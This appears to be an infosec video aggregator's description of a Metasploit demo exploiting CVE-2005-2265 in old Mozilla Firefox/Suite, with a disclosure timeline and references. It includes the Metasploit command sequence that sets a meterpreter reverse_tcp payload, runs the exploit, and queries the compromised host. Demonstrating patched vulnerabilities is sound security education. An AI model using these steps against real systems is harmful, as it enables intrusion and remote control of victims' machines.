Description: Timeline :
Vulnerability reported to the vendor by Aviv Raff the 2005-05-28
Version 1.0.5 of Mozilla Firefox & 1.7.10 of Mozilla Suite released the 2005-07-12
Vulnerability & PoC disclosure by Aviv Raff the 2005-07-13
PoC provided by:
hdm
Aviv Raff
Reference(s) :
CVE-2005-2265
MFSA 2005-50
Affected versions :
Mozilla Firefox previous version 1.0.5
Mozilla Suite previous version 1.7.10
Tested on Windows XP SP3 with Mozilla Firefox 1.0.4
Description :
This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff's HTML PoC.
Metasploit demo :
use exploit/multi/browser/mozilla_compareto
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
Tags: mozilla , firefox , thunderbird , microsoft , windows , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.